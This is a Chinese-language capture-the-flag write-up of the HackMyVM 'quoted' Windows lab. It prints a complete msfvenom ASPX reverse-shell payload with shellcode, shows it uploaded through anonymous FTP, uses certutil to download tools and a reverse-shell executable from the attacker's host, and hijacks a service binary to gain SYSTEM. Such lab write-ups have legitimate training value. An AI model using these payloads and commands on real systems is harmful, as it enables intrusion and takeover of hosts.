文章

quoted

quoted

image-20250608201539520

image-20250608203928661

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
┌──(kali㉿kali)-[~/temp/quoted]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.105:21
Open 192.168.10.105:445
Open 192.168.10.105:80
Open 192.168.10.105:135
Open 192.168.10.105:139
Open 192.168.10.105:5357
Open 192.168.10.105:49152
Open 192.168.10.105:49153
Open 192.168.10.105:49155
Open 192.168.10.105:49156
Open 192.168.10.105:49157
Open 192.168.10.105:49154

PORT      STATE SERVICE      REASON          VERSION
21/tcp    open  ftp          syn-ack ttl 128 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-05-24  12:16PM       <DIR>          aspnet_client
| 10-05-24  12:27AM                  689 iisstart.htm
|_10-05-24  12:27AM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         syn-ack ttl 128 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:0B:1E:2F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: QUOTED-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0b:1e:2f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   QUOTED-PC<00>        Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   QUOTED-PC<20>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   08:00:27:0b:1e:2f:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: quoted-PC
|   NetBIOS computer name: QUOTED-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-06-08T15:41:51+03:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 58509/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 48287/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 7707/udp): CLEAN (Timeout)
|   Check 4 (port 10964/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-06-08T12:41:51
|_  start_date: 2025-06-08T12:36:01
|_clock-skew: mean: -59m54s, deviation: 1h43m55s, median: 5s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~/temp/quoted]
└─$ dirsearch -u http://$IP/ 2>/dev/null                                                                           

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/temp/quoted/reports/http_192.168.10.105/__25-06-08_08-46-41.txt

Target: http://192.168.10.105/

[08:46:41] Starting: 
[08:46:42] 403 -  312B  - /%2e%2e//google.com
[08:46:42] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:46:42] 404 -    1KB - /.asmx
[08:46:42] 404 -    1KB - /.ashx
[08:46:52] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:47:10] 301 -  162B  - /aspnet_client  ->  http://192.168.10.105/aspnet_client/
[08:47:10] 403 -    1KB - /aspnet_client/
[08:47:14] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:47:52] 404 -    1KB - /service.asmx
[08:48:01] 403 -    2KB - /Trace.axd
[08:48:02] 404 -    2KB - /umbraco/webservices/codeEditorSave.asmx
[08:48:07] 404 -    1KB - /WebResource.axd?d=LER8t9aS

Task Completed

漏洞发现

踩点

image-20250608210017295

查看源代码但是并未发现有些啥,尝试别的方向。

ftp服务探测

前面探测到可以进行匿名登录,尝试看一下有些啥:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/temp/quoted]
└─$ ftp $IP
Connected to 192.168.10.105.
220 Microsoft FTP Service
Name (192.168.10.105:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> mget *
mget iisstart.htm [anpqy?]? 
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************|   689        0.98 MiB/s    00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (507.42 KiB/s)
mget welcome.png [anpqy?]? 
229 Entering Extended Passive Mode (|||49163|)
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************|   180 KiB    3.80 MiB/s    00:00 ETA
226 Transfer complete.
WARNING! 820 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
184946 bytes received in 00:00 (3.75 MiB/s)

然后发现正是web的目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(kali㉿kali)-[~/temp/quoted]
└─$ cat iisstart.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#B3B3B3;
        margin:0;
}

#container {
        margin-left:auto;
        margin-right:auto;
        text-align:center;
        }

a img {
        border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>                                                                                                                                                                                             
┌──(kali㉿kali)-[~/temp/quoted]
└─$ curl -s http://$IP/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#B3B3B3;
        margin:0;
}

#container {
        margin-left:auto;
        margin-right:auto;
        text-align:center;
        }

a img {
        border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>

进行探测,看一下是否可以上传shell!因为是IIS所以尝试上传的为aspx的shell。。

上传aspx反弹shell

首先我们需要一个.aspx的木马,可以找现成的,也可以直接使用msf生成一个:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3407 bytes
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] my9L = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,
0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,
0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,
0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,
0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,
0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,
0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,
0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,
0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x04,0xd2,
0xc0,0xa8,0x0a,0x6a,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,
0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,
0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,0x6d,0x64,0x00,0x00,
0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,
0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,
0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,
0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,
0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,
0x59,0x41,0x89,0xda,0xff,0xd5};

        IntPtr vIGwqi5 = VirtualAlloc(IntPtr.Zero,(UIntPtr)my9L.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(my9L,0,vIGwqi5,my9L.Length);
        IntPtr kHduZ8ZlHs = IntPtr.Zero;
        IntPtr nDx9WQ2UEd = CreateThread(IntPtr.Zero,UIntPtr.Zero,vIGwqi5,IntPtr.Zero,0,ref kHduZ8ZlHs);
    }
</script>

┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3409 bytes

尝试上传:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/temp/quoted]
└─$ ftp $IP
Connected to 192.168.10.105.
220 Microsoft FTP Service
Name (192.168.10.105:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx 
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49166|)
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************|  3454       36.19 MiB/s    --:-- ETA
226 Transfer complete.
3454 bytes sent in 00:00 (1.33 MiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/temp/quoted]
└─$ curl -s http://$IP/shell.aspx

发现弹过来了!

image-20250608213349971

提权

信息搜集

又是windows靶机,这段时间做了好几个了,尝试上传WinPEAS进行信息搜集!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
c:\Users\quoted\Desktop>dir
dir
 C s�r�c�s�ndeki birimin etiketi yok.
 Birim Seri Numaras�: D4DC-8644

 c:\Users\quoted\Desktop dizini

06.10.2024  17:25    <DIR>          .
06.10.2024  17:25    <DIR>          ..
06.10.2024  17:25                23 user.txt
               1 Dosya               23 bayt
               2 Dizin   22.207.266.816 bayt bo�

c:\Users\quoted\Desktop>type user.txt
type user.txt
HMV{User_Flag_Obtained}
c:\Users\quoted\Desktop>certutil -urlcache -split -f http://192.168.10.106:8888/winPEAS.bat
certutil -urlcache -split -f http://192.168.10.106:8888/winPEAS.bat
****  �evrimi�i  ****
  0000  ...
  9056
CertUtil: -URLCache komutu ba�ar�yla tamamland�.

c:\Users\quoted\Desktop>whoami /all
whoami /all

KULLANICI B�LG�LER�
-------------------

Kullan�c� ad�                SID     
============================ ========
nt authority\network service S-1-5-20


GRUP B�LG�LER�
--------------

Grup Ad�                             T�r              SID                                                           �znitelikler                                                
==================================== ================ ============================================================= ============================================================
Zorunlu Etiket\Sistem Zorunlu D�zeyi Etiket           S-1-16-16384                                                                                                              
Everyone                             �yi bilinen grup S-1-1-0                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\Users                        Di�er Ad         S-1-5-32-545                                                  Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\SERVICE                 �yi bilinen grup S-1-5-6                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
KONSOL OTURUMU A�MA                  �yi bilinen grup S-1-2-1                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\Authenticated Users     �yi bilinen grup S-1-5-11                                                      Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
NT AUTHORITY\This Organization       �yi bilinen grup S-1-5-15                                                      Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
BUILTIN\IIS_IUSRS                    Di�er Ad         S-1-5-32-568                                                  Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
LOCAL                                �yi bilinen grup S-1-2-0                                                       Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup
IIS APPPOOL\DefaultAppPool           �yi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsay�lan olarak etkin, Etkinle�tirilmi� grup


AYRICALIK B�LG�LER�
----------------------

Ayr�cal�k Ad�                 A��klama                                                 Durum     
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege ��lem d�zeyi belirtecini de�i�tir                        Devre D���
SeIncreaseQuotaPrivilege      ��lem i�in bellek kotalar� ayarla                        Devre D���
SeSecurityPrivilege           Denetimi ve g�venlik g�nl���n� y�net                     Devre D���
SeShutdownPrivilege           Sistemi kapat                                            Devre D���
SeAuditPrivilege              G�venlik denetimleri olu�tur                             Devre D���
SeChangeNotifyPrivilege       �apraz ge�i� denetimini atla                             Etkin     
SeUndockPrivilege             Bilgisayar� takma biriminden ��kar                       Devre D���
SeImpersonatePrivilege        Kimlik do�rulamas�ndan sonra istemcinin �zelliklerini al Etkin     
SeCreateGlobalPrivilege       Genel nesneler olu�tur                                   Etkin     
SeIncreaseWorkingSetPrivilege ��lem �al��ma k�mesini art�r                             Devre D���
SeTimeZonePrivilege           Saat dilimini de�i�tir 

官网下的会在这里起冲突,我下载的是:https://github.com/Fa1c0n35/winPEAS,比较好用,不会报错,然后找到:

image-20250608222004381

显示可能存在dll劫持,尝试构建相关文件进行替换劫持

DLL劫持提权

先搞一个木马:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/temp/quoted]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.106 lport=2345 -f exe > dotNet.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes

将其上传以后尝试启动服务:

image-20250608222825478

发现正常启动了,但是并未反弹shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
c:\Users\quoted\Desktop>certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
****  �evrimi�i  ****
  0000  ...
  1c00
CertUtil: -URLCache komutu ba�ar�yla tamamland�.

c:\Users\quoted\Desktop>service PEService start
service PEService start
'service' i� ya da d�� komut, �al��t�r�labilir
program ya da toplu i� dosyas� olarak tan�nm�yor.

c:\Users\quoted\Desktop>sc start PEService
sc start PEService
[SC] StartService BA�ARISIZ OLDU, hata: 193.

才发现是下载错了地址。。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
c:\Users\quoted\Desktop>cd ../../../
cd ../../../

c:\>certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
certutil -urlcache -split -f http://192.168.10.106:8888/dotNet.exe
****  �evrimi�i  ****
  0000  ...
  1c00
CertUtil: -URLCache komutu ba�ar�yla tamamland�.

c:\>sc start PEService
sc start PEService
[SC] StartService BA�ARISIZ - 1053:

Hizmet, belirli aral�klarla yap�lan ba�lama veya denetim iste�ine yan�t vermedi.

发现正常执行了,另一边shell也弹回来了!!!

image-20250608223401991

拿到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
C:\>cd Users/Administrator
cd Users/Administrator

C:\Users\Administrator>dir
dir
 C s�r�c�s�ndeki birimin etiketi yok.
 Birim Seri Numaras�: D4DC-8644

 C:\Users\Administrator dizini

05.10.2024  00:09    <DIR>          .
05.10.2024  00:09    <DIR>          ..
05.10.2024  00:09    <DIR>          Contacts
05.10.2024  18:23    <DIR>          Desktop
05.10.2024  14:11    <DIR>          Documents
05.10.2024  00:09    <DIR>          Downloads
05.10.2024  00:09    <DIR>          Favorites
05.10.2024  00:09    <DIR>          Links
05.10.2024  00:09    <DIR>          Music
05.10.2024  00:09    <DIR>          Pictures
05.10.2024  00:09    <DIR>          Saved Games
05.10.2024  00:09    <DIR>          Searches
05.10.2024  00:09    <DIR>          Videos
               0 Dosya                0 bayt
              13 Dizin   22.146.179.072 bayt bo�

C:\Users\Administrator>cd desktop
cd desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Elevated_Shell_Again}
本文由作者按照 CC BY 4.0 进行授权